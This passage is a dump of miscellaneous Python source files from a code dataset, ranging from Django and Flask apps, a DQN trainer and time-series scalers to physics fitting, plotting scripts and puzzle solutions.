(1).py","file_name":"concordance (1).py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"244525877","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('parafagile', '0009_auto_20161115_1425'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='organization',\n name='avatar',\n field=models.URLField(default='https://avatars2.githubusercontent.com/u/16116810?v=3&s=200'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='organization',\n name='type',\n field=models.CharField(max_length=15, choices=[(b'ORG', b'Organization'), (b'USR', b'User')]),\n ),\n ]\n","sub_path":"app/parafagile/migrations/0010_auto_20170101_1116.py","file_name":"0010_auto_20170101_1116.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"494195736","text":"from PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nimport sys\n\n__appname__ = \"File Dialog\"\n\nclass Program(QDialog):\n def __init__(self, parent=None):\n super(Program, self).__init__(parent)\n\n openButton = QPushButton(\"Open\")\n saveButton = QPushButton(\"Save\")\n dirButton = QPushButton(\"Other\")\n closeButton = QPushButton(\"Close...\")\n\n openButton.clicked.connect(self.open)\n saveButton.clicked.connect(self.save)\n\n layout = QVBoxLayout()\n layout.addWidget(openButton)\n layout.addWidget(saveButton)\n layout.addWidget(dirButton)\n layout.addWidget(closeButton)\n\n self.setLayout(layout)\n\n def open(self):\n dirname = \".\"\n # Returns a filename as a string - QString\n # Pyside is a tuple\n fileObj = QFileDialog.getOpenFileName(self, \"Please selct your file brah\" + __appname__, dirname, filter=\"Text files (*.txt)\")\n filename = fileObj[0]\n file = open(filename, \"r\")\n read = file.read()\n file.close()\n\n def save(self):\n dirname = \".\"\n fileObj = QFileDialog.getSaveFileName(self, __appname__, dirname, filter=\"Text files (*.txt)\")\n fileName = fileObj[0]\n contents = \"File text to be saved\"\n open(fileName, \"w\").write(contents)\n print(fileName)\n\napp = QApplication(sys.argv)\nform = Program()\nform.show()\napp.exec_()","sub_path":"Dialogs/FileDialog.py","file_name":"FileDialog.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"93310714","text":"from django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages \nfrom models import * \nimport bcrypt\n\n\ndef index(request):\n request.session.clear()\n return render(request, ('login/index.html'))\n\n\ndef process(request):\n if request.method == 'POST':\n errors = User.objects.basic_validator(request.POST)\n if len(errors):\n for tag, error in errors.iteritems():\n messages.error(request, error, extra_tags=tag)\n return redirect('/')\n else:\n hash1 = bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt())\n request.session['name'] = request.POST['first_name']\n User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], email=request.POST['email'], password=hash1) \n u = User.objects.get(email=request.POST['email'])\n request.session['id'] = u.id\n return redirect('/books')\n\n\ndef login(request):\n if request.method == 'POST':\n errors = User.objects.login_validator(request.POST)\n if len(errors):\n for tag, error in errors.iteritems():\n messages.error(request, error, extra_tags=tag)\n return redirect('/')\n else:\n u = User.objects.get(email=request.POST['email'])\n request.session['id'] = u.id\n request.session['name'] = u.first_name\n return redirect ('/books')\n\n\n\ndef success(request):\n if 'id' not in request.session:\n return redirect('/')\n else:\n return render(request, ('login/books.html'))\n\n\ndef add(request):\n if 'id' not in request.session:\n return redirect('/')\n return render(request, ('login/add.html'))","sub_path":"Python/django/belt_reviewer/apps/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"11292473","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom toscaparser.elements.property_definition import PropertyDef\nfrom toscaparser.elements.statefulentitytype import StatefulEntityType\n\n\nclass CapabilityType(StatefulEntityType):\n '''TOSCA built-in capabilities type.'''\n TOSCA_TYPEURI_CAPABILITY_ROOT = 'tosca.capabilities.Root'\n\n def __init__(self, name, ctype, ntype, custom_def=None):\n self.name = name\n super(CapabilityType, self).__init__(ctype, self.CAPABILITY_PREFIX,\n custom_def)\n self.nodetype = ntype\n self.properties = None\n self.custom_def = custom_def\n if self.PROPERTIES in self.defs:\n self.properties = self.defs[self.PROPERTIES]\n\n @property\n def parent_type(self):\n '''Return a capability this capability is derived from.'''\n if not hasattr(self, 'defs'):\n return None\n pnode = self.derived_from(self.defs)\n if pnode:\n return CapabilityType(self.name, pnode,\n self.nodetype, self.custom_def)\n\n def inherits_from(self, type_names):\n '''Check this capability is in type_names\n\n Check if this capability or some of its parent types\n are in the list of types: type_names\n '''\n if self.type in type_names:\n return True\n elif self.parent_type:\n return self.parent_type.inherits_from(type_names)\n else:\n return False\n","sub_path":"toscaparser/elements/capabilitytype.py","file_name":"capabilitytype.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"347655358","text":"from sklearn.base import TransformerMixin\n\nfrom tslearn.utils import npy3d_time_series_dataset\n\n__author__ = 'Romain Tavenard romain.tavenard[at]univ-rennes2.fr'\n\n\nclass TimeSeriesScalerMinMax(TransformerMixin):\n \"\"\"Scaler for time series. Scales time series so that their span in each dimension is between ``min`` and ``max``.\n \n Example\n -------\n >>> TimeSeriesScalerMinMax(min=1., max=2.).fit_transform([[0, 3, 6]]) # doctest: +NORMALIZE_WHITESPACE\n array([[[ 1. ],\n [ 1.5],\n [ 2. ]]])\n \"\"\"\n def __init__(self, min=0., max=1.):\n self.min_ = min\n self.max_ = max\n\n def fit_transform(self, X):\n \"\"\"Fit to data, then transform it.\n\n Parameters\n ----------\n X\n Time series dataset to be rescaled\n\n Returns\n -------\n numpy.ndarray\n Rescaled time series dataset\n \"\"\"\n X_ = npy3d_time_series_dataset(X)\n for i in range(X_.shape[0]):\n for d in range(X_.shape[2]):\n cur_min = X_[i, :, d].min()\n cur_max = X_[i, :, d].max()\n cur_range = cur_max - cur_min\n X_[i, :, d] = (X_[i, :, d] - cur_min) * (self.max_ - self.min_) / cur_range + self.min_\n return X_\n\n\nclass TimeSeriesScalerMeanVariance(TransformerMixin):\n \"\"\"Scaler for time series. Scales time series so that their mean (resp. variance) in each dimension is ``mu``\n (resp. ``std``).\n \n Example\n -------\n >>> TimeSeriesScalerMeanVariance(mu=0., std=1.).fit_transform([[0, 3, 6]]) # doctest: +NORMALIZE_WHITESPACE\n array([[[-1.22474487],\n [ 0. ],\n [ 1.22474487]]])\n \"\"\"\n def __init__(self, mu=0., std=1.):\n self.mu_ = mu\n self.std_ = std\n\n def fit_transform(self, X):\n \"\"\"Fit to data, then transform it.\n \n Parameters\n ----------\n X\n Time series dataset to be rescaled\n\n Returns\n -------\n numpy.ndarray\n Rescaled time series dataset\n \"\"\"\n X_ = npy3d_time_series_dataset(X)\n for i in range(X_.shape[0]):\n for d in range(X_.shape[2]):\n cur_mean = X_[i, :, d].mean()\n cur_std = X_[i, :, d].std()\n X_[i, :, d] = (X_[i, :, d] - cur_mean) * self.std_ / cur_std + self.mu_\n return X_\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","sub_path":"tslearn/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"172632239","text":"import sys\nimport time\nfrom datetime import datetime\nfrom collections import deque, Counter\nimport numpy as np\n\nsys.path.append('../')\nfrom utils import get_random\nfrom config import get_opt\nfrom visualizer import CurrentStateVisualizer, EvaluationVisualizer, QValueVisualizer\n\ndef get_device_name(opt):\n if opt.gpu >= 0:\n return '/gpu:{}'.format(opt.gpu)\n else:\n return None\n\ndef train_main(game_env, agent, game_actions, opt):\n\n learn_start = opt.learn_start\n start_time = time.time()\n time_history = deque(maxlen=10)\n reward_history = []\n step = 0\n num_epi = 0\n num_frame = 0\n time_history.append(0)\n cur_epi_count = 0\n cur_epi_reward = 0\n cur_total_epi_reward = 0\n cur_total_epi_count = 0\n total_epi_reward = 0\n max_epi_reward = 0\n total_max_reward = 0\n action_index = 0\n current_state_visualizer = CurrentStateVisualizer(opt)\n eval_visualizer = EvaluationVisualizer(opt)\n q_value_visualizer = QValueVisualizer(opt)\n \n\n get_random().manualSeed(1)\n\n screen, reward, terminal, info = game_env.getState();\n\n start_datetime = datetime.now()\n \n last_screen = None\n\n print(\"Iteration ..\", opt.steps, start_datetime.strftime('%Y-%m-%d %H:%M:%S'))\n while step < opt.steps:\n step += 1\n\n if opt.render:\n game_env.render()\n\n action_index = agent.perceive(screen, reward, terminal, testing=False, testing_ep=None)\n\n if not terminal:\n screen, reward, terminal, info = game_env.step(game_actions[action_index], training=opt.step_train_mode)\n\n cur_epi_reward += reward\n if 'frameskip' in info:\n num_frame += info['frameskip']\n else:\n num_frame += np.mean(opt.actrep) if isinstance(opt.actrep, tuple) else opt.actrep\n else:\n num_epi += 1\n cur_epi_count += 1\n cur_total_epi_reward += cur_epi_reward\n max_epi_reward = max(max_epi_reward, cur_epi_reward)\n cur_epi_reward = 0\n\n if opt.random_starts > 0 :\n screen, reward, terminal, info = game_env.nextRandomGame()\n else:\n screen, reward, terminal, info = game_env.newGame()\n\n\n if step % opt.prog_freq == 0 :\n assert step==agent.numSteps, 'trainer step: {0} & agent.numSteps: {1}'.format(step,agent.numSteps)\n print('------------------------------------------------')\n cur_avg_epi_reward = max(cur_total_epi_reward, cur_epi_reward) / max(1, cur_epi_count)\n cur_total_epi_count = cur_total_epi_count + cur_epi_count\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), \"Steps: \", step, \"epsilon:{:.2f}\".format(agent.ep), \"Episodes:\", num_epi, 'total_epi_reward:', cur_total_epi_reward, 'max_epi_reward:', max_epi_reward, 'avg_epi_reward:{:.2f}'.format(cur_avg_epi_reward))\n current_state = dict(\n average_episode_scores = cur_avg_epi_reward,\n episode_count = cur_total_epi_count,\n epsilon = agent.ep\n )\n current_state_visualizer.addCurrentState(current_state)\n current_state_visualizer.flush(step)\n \n cur_epi_reward = 0\n cur_total_epi_reward = 0\n cur_epi_count = 0\n max_epi_reward = 0\n\n if step % opt.eval_freq == 0 and step > learn_start:\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{}] eval start'.format(step))\n\n total_reward = 0\n nrewards = 0\n nepisodes = 0\n episode_reward = 0\n eval_frames = 0\n score_list = []\n eval_time = time.time()\n\n game_env.start_recording(step, q_value_visualizer)\n\n screen, reward, terminal, info = game_env.newGame()\n \n for estep in range(opt.eval_steps):\n\n action = agent.perceive(screen, reward, terminal, testing=True, testing_ep=0.05)\n\n q_value_visualizer.collect_q_value(agent.q)\n\n # Play game in test mode (episodes don't end when losing a life)\n screen, reward, terminal, info = game_env.step(game_actions[action], training=False)\n\n if 'frameskip' in info:\n eval_frames += info['frameskip']\n else:\n eval_frames += opt.actrep\n\n if terminal:\n print('episode:{} score:{}'.format(game_env.episode_id, game_env.episode_score))\n screen, reward, terminal, info = game_env.nextRandomGame()\n \n \n if estep % opt.prog_freq == 0 :\n print('eval steps {0}/{1}'.format(estep, opt.eval_steps))\n \n game_env.stop_recording()\n\n total_reward = sum(game_env.get_episode_scores())\n nepisodes = game_env.get_num_episode()\n avg_epi_reward = np.mean(game_env.get_episode_scores())\n \n eval_time = time.time() - eval_time\n start_time += eval_time\n agent.compute_validation_statistics()\n \n eval_values = dict(episode_score=np.array(game_env.get_episode_scores()), episode_count=nepisodes)\n valid_values = dict(TDerror=agent.tderr_avg, V=agent.v_avg)\n eval_visualizer.addEvaluation(eval_values)\n eval_visualizer.addValidation(valid_values)\n eval_visualizer.flush(step)\n\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'V {0} TD error {1} Qmax {2}'.format(agent.v_avg, agent.tderr_avg, agent.q_max))\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'episode_count:{0} total_epi_reward:{1:d} avg_epi_reward:{2:.2f}'.format(nepisodes, int(total_reward), total_reward / nepisodes))\n \n reward_history.append(total_reward)\n \n time_history.append(time.time() - start_time)\n \n last_idx = 0\n time_dif = 0\n\n training_rate =0\n \n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'Steps: {0} (frames: {1}), reward: {2:.2f}, epsiron: {3:.2f}, lr:{4:.5f}, training time: {5}s, training rate: {6}fps, testing time: {7}s testing rate: {8}fps, num. ep.: {9}, num. rewards: {10}'.format(\n step,\n num_frame,\n avg_epi_reward,\n 0.05,\n agent.lr,\n int(time_dif),\n int(training_rate),\n eval_time,\n int(eval_frames / eval_time),\n nepisodes,\n nrewards))\n\n if opt.save_transitions_freq and step % opt.save_transitions_freq == 0:\n filepath = '{}/{}_{}_transitions_score_step{:010d}.txt'.format(opt.log_dir, opt.env, opt.backend, step)\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{0}] save score distribution in transitions to [{1}]'.format(step, filepath))\n _save_score_dist(agent.transitions.score[:agent.transitions.numEntries], filepath)\n filepath = '{}/{}_{}_samplebuf_score_step{:010d}.txt'.format(opt.log_dir, opt.env, opt.backend, step)\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{0}] save score distribution in sample buffer to [{1}]'.format(step, filepath))\n _save_score_dist(agent.transitions.buf_score, filepath)\n\n if step % opt.save_freq == 0 or step == opt.steps:\n filepath = '{}/{}_{}_network_step{:010d}.dat'.format(opt.log_dir, opt.env, opt.backend, step)\n print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'step[{0}] save network to [{1}]'.format(step, filepath))\n agent.save_network(filepath)\n\n \n\n sys.stdout.flush()\n\ndef _save_score_dist(scores, filepath):\n count_score = Counter(scores)\n str = ''\n for cls, num in count_score.most_common():\n str = '{}{:d}:{}\\n'.format(str, cls*10, num)\n str = '{}total {}\\n'.format(str, scores.sum())\n str = '{}max {}\\n'.format(str, scores.max())\n str = '{}min {}\\n'.format(str, scores.min())\n str = '{}mean {}\\n'.format(str, scores.mean())\n str = '{}median {}\\n'.format(str, np.median(scores))\n str = '{}var {}\\n'.format(str, np.var(scores))\n str = '{}std {}\\n'.format(str, np.std(scores, ddof=1))\n print(str)\n with open(filepath, 'wt') as f:\n f.write(str)\n\n\ndef test_main(game_env, agent, game_actions, opt):\n\n total_reward = 0\n nrewards = 0\n nepisodes = 0\n episode_reward = 0\n episode_rewards = []\n\n eval_time = time.time()\n \n q_value_visualizer = QValueVisualizer(opt)\n \n print('--------------------------------------------------------------')\n print('test start',datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n if opt.test_recording:\n game_env.start_recording(0, q_value_visualizer)\n\n screen, reward, terminal, info = game_env.getState()\n\n while nepisodes < opt.test_episodes:\n \n action = agent.perceive(screen, reward, terminal, True, opt.test_ep)\n\n q_value_visualizer.collect_q_value(agent.q)\n\n screen, reward, terminal, info = game_env.step(game_actions[action], False)\n\n episode_reward = episode_reward + reward\n\n if opt.render:\n game_env.render(agemt.q)\n\n if terminal:\n print('episode:{:03d} reward:{}'.format(nepisodes+1, episode_reward))\n episode_rewards.append(episode_reward)\n episode_reward = 0\n nepisodes = nepisodes + 1\n\n screen, reward, terminal, info = game_env.nextRandomGame()\n \n if opt.test_recording:\n game_env.stop_recording()\n\n episode_rewards = np.array(episode_rewards)\n print('test end', datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\n 'total reward: {:.2f}'.format(episode_rewards.sum()),\n '[{}]average reward: {:.2f}'.format(opt.test_episodes, episode_rewards.mean()),\n '[{}]stdv: {:.2f}'.format(opt.test_episodes, episode_rewards.std(ddof=1)),\n '[30]average reward: {:.2f}'.format(episode_rewards[:30].mean()),\n '[30]stdv: {:.2f}'.format(episode_rewards[:30].std(ddof=1)),\n )\n\ndef main():\n import subprocess\n import os\n\n opt = get_opt()\n\n from initenv import setup\n game_env, agent, game_actions, opt = setup(opt)\n\n if opt.test:\n test_main(game_env, agent, game_actions, opt)\n else:\n rootdir = os.getcwd().replace(\"/dqn\",\"\")\n subprocess.run([os.path.join(rootdir,\"copy_source.sh\"), rootdir, opt.log_dir])\n train_main(game_env, agent, game_actions, opt)\n\n del game_env\n\n\nif __name__ == '__main__':\n \n main()\n","sub_path":"dqn/train_agent.py","file_name":"train_agent.py","file_ext":"py","file_size_in_byte":10837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"482078263","text":"#!/usr/bin/python\nfrom ROOT import *\n\nuseSingleGaussian = True\n\nworkspace = RooWorkspace('etac mass')\n#construct double gaussian resolution function and breit wigner\nworkspace.factory('BreitWigner::breitwigner(x[2.65, 3.25], BreitWignerMean[2.983], BreitWignerWidth[0.0322])')\nworkspace.var('x').setUnit('GeV/c^{2}')\nworkspace.factory('Gaussian::gaus1(x, GausMean1[0.006, -0.01, 0.01], GausSigma1[0.003, -0.02, 0.02])')\nworkspace.factory('expr::GausSigma2(\\'GausSigma1*alpha\\',GausSigma1,alpha[3., 1., 5.])')\nworkspace.factory('expr::GausMean2(\\'GausMean1 + MeanShift\\', GausMean1, MeanShift[0.02, -0.04, 0.04])')\nworkspace.factory('Gaussian::gaus2(x, GausMean2, GausSigma2)')\nworkspace.factory('SUM::ResolutionSignal(fracgaus1[0.9, 0.1, 0.99]*gaus1, gaus2)')\n#build signal function as convolution of breit-wigner and resolution function\nworkspace.factory('FCONV::CompleteSignalModel(x, breitwigner, ResolutionSignal)')\nworkspace.factory('FCONV::OneGaussianSignalModel(x, breitwigner, gaus1)')\n#print workspace content\nworkspace.Print()\n#generate data\nif useSingleGaussian:\n pdf = workspace.pdf('OneGaussianSignalModel')\nelse:\n pdf = workspace.pdf('CompleteSignalModel')\n\ndatahist = pdf.generate(RooArgSet(workspace.var('x')), 3000)\npdf.fitTo(datahist, RooFit.Strategy(2), RooFit.Minimizer('Minuit2'))\n\n#print data and fit\ncanvas = TCanvas('canvas', 'canvas')\ncanvas.cd()\nframe = workspace.var('x').frame()\ndatahist.plotOn(frame)\npdf.plotOn(frame)\nframe.Draw()\ncanvas.Print('DoubleGaussianConvolution.pdf')\n","sub_path":"ROOT/fit/BreitWignerConvolution_workspace.py","file_name":"BreitWignerConvolution_workspace.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"482687629","text":"from flask import Blueprint, render_template, request, jsonify, url_for\nimport requests\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nfrom selenium import webdriver\n\nbp = Blueprint('main', __name__, url_prefix='/')\n\n@bp.route('/')\ndef index():\n return render_template('index.html')\n\n@bp.route('/clock')\ndef clock():\n return render_template('clock.html')\n\n@bp.route('/stock', methods=['POST'])\ndef stock():\n # company_codes = [\"005930\", \"000660\", \"005380\"]\n data = request.get_json()\n code1 = data['code1']\n code2 = data['code2']\n code3 = data['code3']\n\n company_codes = []\n company_codes.append(code1)\n company_codes.append(code2)\n company_codes.append(code3)\n\n prices = []\n for item in company_codes:\n now_price = get_price(item)\n prices.append(now_price)\n\n sise = {\n 'code1': prices[0], 'code2': prices[1], 'code3': prices[2]\n }\n\n return jsonify(result2= \"ok\", result3= sise, now= datetime.today())\n\ndef get_price(company_code):\n bs_obj = get_bsoup(company_code)\n no_today = bs_obj.find(\"p\", {\"class\": \"no_today\"})\n blind = no_today.find(\"span\", {\"class\": \"blind\"})\n\n now_price = blind.text\n return now_price\n\ndef get_bsoup(company_code):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n url = \"https://finance.naver.com/item/main.nhn?code=\" + company_code\n\n result = requests.get(url, headers=headers)\n if result.status_code == 200:\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\n return bs_obj\n else:\n print(result.status_code)\n\n# daum - ajax\n@bp.route('/daum', methods=['POST'])\ndef daum():\n data = request.get_json()\n code1 = data['code1']\n code2 = data['code2']\n code3 = data['code3']\n\n company_codes = []\n company_codes.append(code1)\n company_codes.append(code2)\n company_codes.append(code3)\n\n prices = []\n for item in company_codes:\n now_price = get_daum(item)\n prices.append(now_price)\n\n sise = {\n 'code1': prices[0], 'code2': prices[1], 'code3': prices[2]\n }\n\n return jsonify(result2= \"ok\", result3= sise, now= datetime.today())\n\ndef get_daum(company_code):\n headers = {\n 'Referer': 'http://finance.daum.net',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 OPR/58.0.3135.127'\n }\n\n url = 'https://finance.daum.net/api/quotes/A%s?summary=false&changeStatistics=true' %(company_code)\n\n response = requests.get(url, headers=headers)\n jsonObj = response.json()\n #print(jsonObj)\n #print(jsonObj['name'] + '(' + jsonObj['symbolCode'] + ')')\n\n now_price = jsonObj['tradePrice']\n return now_price\n\n# itooza - bs4\n@bp.route('/itooza_stock', methods=['POST'])\ndef itooza_stock():\n data = request.get_json()\n code1 = data['code1']\n code2 = data['code2']\n code3 = data['code3']\n\n company_codes = []\n company_codes.append(code1)\n company_codes.append(code2)\n company_codes.append(code3)\n\n prices = []\n for item in company_codes:\n now_price = get_itooza(item)\n prices.append(now_price)\n\n sise = {\n 'code1': prices[0], 'code2': prices[1], 'code3': prices[2]\n }\n\n return jsonify(result2= \"ok\", result3= sise, now= datetime.today())\n\ndef get_itooza(company_code):\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n url = 'https://search.itooza.com/search.htm?seName=' + company_code\n\n result = requests.get(url, headers=headers)\n bs_obj = BeautifulSoup(result.content, \"html.parser\")\n find_1 = bs_obj.find(\"h2\", {\"class\": \"increase\"})\n find_2 = find_1.find(\"span\")\n\n now_price = find_2.text\n return now_price\n\n\n\n","sub_path":"pybo/views/main_views.py","file_name":"main_views.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"215099153","text":"# Jan 29 2013\nimport prman\n\nclass Rif(prman.Rif):\n\tflag = 0\n\tdef __init__(self, ri, args):\n\t\tself.scale = float(args[0])\n\t\tself.kind = int(args[1]) # set to 1 for a volume\n\t\tprman.Rif.__init__(self, ri)\n\t\t\t\t\t\n\tdef PointsGeneralPolygons(self, nloops, nverts, verts, params):\n\t\topcodes = []\n\t\tif self.kind == 1: # we want a volume\n\t\t\topcodes.append(8)\n\t\tnumblobs = len(params['P'])/3\n\t\tfor n in range(numblobs):\n\t\t\topcodes.append(1001)\n\t\t\topcodes.append(n * 16)\n\t\topcodes.append(0)\t# blending code\n\t\topcodes.append(numblobs)# blend all blobs\n\t\tfor n in range(numblobs):\n\t\t\topcodes.append(n)# indices of the blobs to blend\n\t\tcommon = (self.scale,0,0,0,0,self.scale,0,0,0,0,self.scale,0)\n\t\ttransforms = (self.scale,0,0,0,0,self.scale,0,0,0,0,self.scale,0)\n\t\txyz = params['P']\n\t\tnumxyz = len(xyz)\n\t\tfor n in range(0, numxyz, 3):\n\t\t\tpos = (xyz[n], xyz[n+1], xyz[n+2])\n\t\t\tif n == 0:\n\t\t\t\ttransforms = common + pos + (1,)\n\t\t\telse:\n\t\t\t\ttransforms = transforms + common + pos + (1,)\n\t\tparams = {}\n\t\tstrs = ('',)\n\t\tself.m_ri.Blobby(numblobs,opcodes,transforms, strs, params)\n\n","sub_path":"Pipeline/the_LATEST/latest_MAYA/maya_SCRIPTS/RfM_python/rif_meshToBlobby.py","file_name":"rif_meshToBlobby.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"359415165","text":"import pandas as pd\nimport glob\n\ndate = \"date_2019_03_03_18_37_03\" #date_2019_02_24_19_50_14\"\nstrat_space = \"S_08\"\ntransition = \"EqualSay_G2_Default\"\n\neps = 2\n\noutput = \"{:s}_{:s}.csv\".format(strat_space, transition)\n#data_filename = \"{:s}_{:s}.csv\".format(strat_space, transition)\n\ndata_folder = \"data/b1_effect/eps_1.00e-0{:d}_beta_2.00e+00_T_5.00e+05_c_1.00_b2_1.20/{:s}/\".format(eps, date)\n\nprint(data_folder)\n\n\ninteresting_files = glob.glob(data_folder + \"*.csv\")\nprint(\"Merging \" + str(len(interesting_files)) + \" files.\")\n#print(interesting_files)\n\ndf_list = []\nfor filename in sorted(interesting_files):\n df_list.append(pd.read_csv(filename))\nfull_df = pd.concat(df_list)\n\nfull_df.to_csv(data_folder + output, index=False)","sub_path":"new_code/merge_csvs.py","file_name":"merge_csvs.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"474168431","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport os\n\nplt.style.use(\"bmh\")\nsns.color_palette(\"hls\", 1)\n\nimport matplotlib\nmatplotlib.rc('xtick', labelsize=14)\nmatplotlib.rc('ytick', labelsize=14)\nmatplotlib.rcParams['mathtext.fontset'] = 'stix'\nmatplotlib.rcParams['font.family'] = 'STIXGeneral'\n\ndef get_data(filename, variables):\n df = pd.read_csv(filename,\\\n delim_whitespace=True, \\\n engine='python', \\\n names=variables)\n return df\n #using pandas to read the data files\n\ndef linear_regresion(x, y):\n n = float(len(x))\n D = float(np.sum(np.square(x)) - (np.sum(x)**2)/n)\n E = float(np.sum(x*y) - np.sum(x)*np.sum(y)/n)\n F = float(np.sum(np.square(y)) - (np.sum(y)**2)/n)\n\n delta_m = np.sqrt((1/(n-2))*(D*F-E**2)/(D**2))\n delta_c = np.sqrt(1/(n-2)*(D/n+np.mean(x)**2)*(D*F-E**2)/(D**2))\n m = E/D\n c = np.mean(y)-m*np.mean(x)\n\n return m, c, delta_m, delta_c\n #using linear regression from Squires, with uncertainty to find slope and constant term\n\n\nresults = get_data(\"../data/different_N_log.txt\", [\"N\", \"f\", \"tau\", \"dtau\", \"LC\", \"SC\", \"BA\", \"HA\"])\nprint(results[\"N\"])\nD = 1\nL = results[\"N\"]**D\nL_res = 1/L\nm, c, delta_m, delta_c = linear_regresion(L_res, -results[\"tau\"])\nx = np.linspace(0, max(L_res), int(10))\ntau_analytic = 187/91\n\nplt.plot(x, c+m*x)\nplt.errorbar(L_res, -results[\"tau\"], yerr=results[\"dtau\"], fmt=\"o\")\n\nplt.fill_between(x, c-delta_c+(m-delta_m)*x, c+delta_c+(m+delta_m)*x, alpha=0.3)\nplt.plot(0, tau_analytic, \"*\")\nprint(c, delta_c)\nplt.xlabel(r\"Recipricol lattice length $\\sqrt{1/N}$\", fontsize=14)\nplt.ylabel(r\"Fisher-exponent $\\tau$\", fontsize=14)\n#plt.savefig(\"../figures/tau.pdf\", bbox_inches=\"tight\")\n#os.system('pdfcrop %s %s &> /dev/null &'%(\"../figures/tau.pdf\", \"../figures/tau.pdf\"))\nplt.show()\n\n\nresults = get_data(\"../data/different_N_log.txt\", [\"N\", \"f\", \"tau\", \"dtau\", \"LC\", \"SC\", \"BA\", \"HA\"])\nm, c, delta_m, delta_c = linear_regresion(np.log(results[\"N\"]), np.log(results[\"BA\"]))\n\nplt.plot(results[\"N\"], results[\"BA\"], \"o\")\nplt.plot(results[\"N\"], np.exp(c + m*np.log(results[\"N\"])))\n#plt.fill_between(results[\"N\"], np.exp(c - delta_c + (m-delta_m)*np.log(results[\"N\"])), np.exp(c + delta_c + (m+delta_m)*np.log(results[\"N\"])), alpha=0.5)\nprint(m, c, delta_m, delta_c)\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlabel(r\"System length $\\,\\,\\sqrt{N}$\", fontsize=14)\nplt.ylabel(r\"Sisze of largest cluster $\\,\\,s_{max}$\", fontsize=14)\n#plt.savefig(\"../figures/largest_cluster.pdf\", bbox_inches=\"tight\")\n#os.system('pdfcrop %s %s &> /dev/null &'%(\"../figures/largest_cluster.pdf\", \"../figures/largest_cluster.pdf\"))\nplt.show()\n","sub_path":"midterm/plotting/plot_different_N.py","file_name":"plot_different_N.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"566056970","text":"\ndef part1():\n f = open(\"/home/ec2-user/environment/AOC/Resources/problem6.txt\")\n s = set()\n answer = 0\n for current in f.readlines():\n current = current.strip()\n if current == \"\\n\" or current == \"\":\n s.clear()\n else:\n for c in current:\n if c not in s:\n s.add(c)\n answer += 1\n return answer\n \nprint(part1())\n\ndef part2():\n f = open(\"/home/ec2-user/environment/AOC/Resources/problem6.txt\")\n s = set()\n t = set()\n newgroup = True\n answer = 0\n for current in f.readlines():\n current = current.strip()\n if current == \"\\n\" or current == \"\":\n answer += len(s)\n s.clear()\n newgroup = True\n else:\n # if this is 